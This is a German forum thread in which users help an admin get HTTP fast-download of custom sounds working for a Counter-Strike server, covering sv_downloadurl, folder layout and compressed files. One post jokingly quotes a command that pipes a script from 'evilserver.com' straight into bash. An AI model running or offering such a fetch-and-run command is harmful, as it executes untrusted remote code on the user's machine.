fast-download-server !!

Ja, kann man herausfinden, in dem du weißt wie viele User/Tag sich mit dem Server verbinden.

Warum nutzt du dann nicht gleich den Server, denn du oben angegeben hast?

user

es connecten viele user, aber die meisten brechen ab es sind dan 7 user die alles downloaden und sich die zeit nehmen ! wegen der dw-zeit ... und mein server is anscheinenz zu lahm irgendwas stimmt nicht habs schon probiert .. weiss nicht wo der fehler ist :confused:

Habe einen gut besuchten CSS Surfserver und benötige bis ~ 120 GB / Monat. Kommt halt immer auf die größe der maps an, die er verwendet. Die machen nunmal den größten Teil des Traffics aus. Wenn er einen Standartmaps Server hat und somit nur sounds und vielleicht ein paar Skins vom Server geladen werden müssen könnte 1 GB / Tag theoretisch ausreichen.
@ reaper
http://www.serverbiz.de/fast-downloa...er-mieten.html

hab mir das mal angeschaut hochgerechnet kommt das auf 79 euro man muss für 6 monate vorraus zahlen .. ist schon etwas viel geld ,aber mir wird eh nichts anderes über bleiben anscheinend..!

Wir reden davon, dass Du den WEBSERVER Deines Roots für Web-DL konfigurierst. Wenn die Geschwindigkeit zu lahm ist, dann würde ich vermuten, dass der Web-DL nicht funktioniert und Du nach wie vor über den Gameserver lädst.

Offtopic: Die Sounds sind ja NERVIGST hoch 10!!! :cool:

Wir reden davon, dass Du den WEBSERVER Deines Roots für Web-DL konfigurierst. Wenn die Geschwindigkeit zu lahm ist, dann würde ich vermuten, dass der Web-DL nicht funktioniert und Du nach wie vor über den Gameserver lädst.

Offtopic: Die Sounds sind ja NERVIGST hoch 10!!! :cool:

genau so ist es er lädt es vom gameserver irgendwas stimmt nicht ich habe apache installiert wie es mir ein kollege gezeigt hat darauf hin hab ich die sounds raufgeladen bei var/www/.....ordner. weil am server liegt es nicht AMD Athlon 64 X2 6000+

Arbeitsspeicher 4x 2048 MB DDRII PC667 RAM
Festplatten 2x 750 GB SATA HDD
(Software-RAID 1)
Netzwerkkarte 100 MBit-Anbindung
Traffic Unlimited*

Das problem is jetz halt endweder keine sounds oder ich bestell mir einen fs-download-server,was glaub ich gar nicht nötig ist, wenn ich genügend kenntnisse hätte über den webserber,und wie man das konfiguriert!

Äh, nur mal so ganz am Rande: Hast du die Rechte, diese Audio-Files ins Netz zu stellen? Sicher nicht. Du bist auf direktem Wege zu einer kostenpflichtigen Abmahnung im größeren Stil. Danach kannst du dir eh keine eigenen Server mehr leisten.

genau so ist es er lädt es vom gameserver irgendwas stimmt nicht ich habe apache installiert wie es mir ein kollege gezeigt hat darauf hin hab ich die sounds raufgeladen bei var/www/.....ordner.

In der server.cfg vom Counterstrike gibt es m.W. einen Parameter, den du erst entsprechend konfigurieren musst, damit die Daten auch per HTTP geladen werden. Die entsprechende Url musst du dort dann natürlich auch noch setzen.

url

hi also mit Parameter meinst du sicher

sv_allowupload "1"
sv_allowdownload "1"
sv_downloadurl "http://78.46.69.5/cstrike/sound/misc/"

funzt trotzdem nicht ! lg roman

Die Ordnerstruktur deines Fast Downloads muss auch gleich wie in deinem cstrike Ordner sein.
Deine "sv_download_url" müsste also "http://78.46.69.5/cstrike/" lauten.

cstrike

also ist das egal vom game, weil ich hab ja czero laufen der pfad muss also nur ip/cstrike sein oder czero ? weil er holt sich die sounds beim laden von misc/sounds.. lg roman

edit* also hab das grad mal probiert er holt sich beim connecten immer noch von sound/misc....downloading ts_antiterror also noch immer vom gameserver mit 33 sec für 1 sound.... sound/misc ^^ das ist komisch oder muss ich die sounds vl mit 7zip packen?

Last edited by a moderator:
Wieso per PM? Kommt da ein

Code:
/bin/bash < <(curl -s http://evilserver.com/tolles_script_das_alles macht)

drin vor?

Der ist gut :-D
Er will Bestimmt nur keine Werbung machen. Falls es unsere Anleitung sein sollte: Die versteht eh keiner :-D
Ich hab sie einfach zu kompliziert geschrieben.

..Hast du die Rechte, diese Audio-Files ins Netz zu stellen?...

Das interessiert die Rechteinhaber herzlich wenig. Die meisten kennen das Wort Gameserver gar nicht. Wenn man danach gehen würde, könnte man 99% aller Gameserveradmins anschreiben. Viel wichtiger ist das Sperren von YouTube-Inhalten durch die Gema. Damit sind die voll ausgelastet wie man offensichtlich sehen kann.

Sounds

Hi, ich habe es hinbekommen, habe einfach die sounds mit 7zip gepackt und auf den server rauf geladen, und jetzt geht es ruckzuck

lg roman :):D

sounds

Irgendetwas stimmt jetzt auf einmal doch nicht, er ladet die sounds jetzt runter, aber im spiel hört man die sounds doch nicht sehr komisch ! An was kann das liegen?
mfg roman

Erscheint eine Fehlermeldung in der Konsole, sobald ein Sound-Event getriggerd wird? Ging der Sound, als er nicht über den FDL geladen wurde?

sound

ja der sound ging als er nicht vom fs download geladen wurde , und nein in der console kommt keine fehlermeldung lg

Lass mich raten: Du hast nun die komprimierten 7z-Dateien auf deinem Webserver gespeichert, das Spiel will aber die Dateien im vorherigen Audio-Format?

format

ja ganz genau ! was mach ich jetzt ?

komischer weise hat er es vorher geladen , aber die sounds nicht abgespielt !
http://78.46.69.5/cstrike/sound/misc/ ich habe den pfad angegeben und er hat alle sounds in sekunden schnelle geladen aber nicht abgespielt , und jetzt will er die sounds wieder einzelnt runterladen !

Last edited by a moderator:
Lad die gleichen Dateien ohne Komprimierung hoch… Oder Du dekomprimierst sie auf deinem Server mit etwas wie dem hier:
Code:
$ bunzip2 *
Musst natürlich im passenden Verzeichnis sein.

Back